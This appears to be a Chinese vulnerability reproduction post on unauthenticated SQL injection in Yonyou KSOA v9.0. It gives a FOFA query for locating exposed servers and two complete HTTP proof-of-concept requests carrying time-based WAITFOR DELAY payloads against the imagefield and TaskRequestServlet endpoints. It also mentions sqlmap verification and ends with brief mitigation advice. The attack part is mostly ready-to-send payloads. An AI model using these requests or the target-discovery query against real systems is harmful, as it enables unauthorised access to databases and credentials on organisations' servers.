用友时空KSOA SQL注入漏洞复现(HW0day)

0x01 产品简介

   用友时空KSOA是建立在SOA理念指导下研发的新一代产品,是根据流通企业最前沿的I需求推出的统一的IT基础架构,它可以让流通企业各个时期建立的IT系统之间彼此轻松对话,帮助流通企业保护原有的IT投资,简化IT管理,提升竞争能力,确保企业整体的战略目标以及创新活动的实现。 

0x02 漏洞概述

   用友时空KSOA /servlet/com.sksoft.v8.trans.servlet.TaskRequestServlet接口和/servlet/imagefield接口处存在sql注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。

0x03 影响范围

用友时空 KSOA v9.0

0x04 复现环境

FOFA:app="用友-时空KSOA"

用友时空KSOA SQL注入漏洞复现(HW0day)_第1张图片 0x05 漏洞复现

PoC-1

GET /servlet/imagefield?key=readimage&sImgname=password&sTablename=bbs_admin&sKeyname=id&sKeyvalue=-1%27;WAITFOR%20DELAY%20%270:0:10%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,
like Gecko)
Accept-Encoding: gzip, deflate
Connection: close

构造注入延时10秒  

 sqlmap验证

用友时空KSOA SQL注入漏洞复现(HW0day)_第2张图片

PoC-2

GET /servlet/com.sksoft.v8.trans.servlet.TaskRequestServlet?unitid=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,
like Gecko)
Accept-Encoding: gzip, deflate
Connection: close

用友时空KSOA SQL注入漏洞复现(HW0day)_第3张图片

 sqlmap验证

用友时空KSOA SQL注入漏洞复现(HW0day)_第4张图片

 0x06 修复建议

临时缓解方案

限制访问来源地址,如非必要,不要将系统开放在互联网上。

升级修复方案

升级至安全版本或打补丁。

 

 

 

 

你可能感兴趣的:(漏洞复现,安全,web安全,网络安全)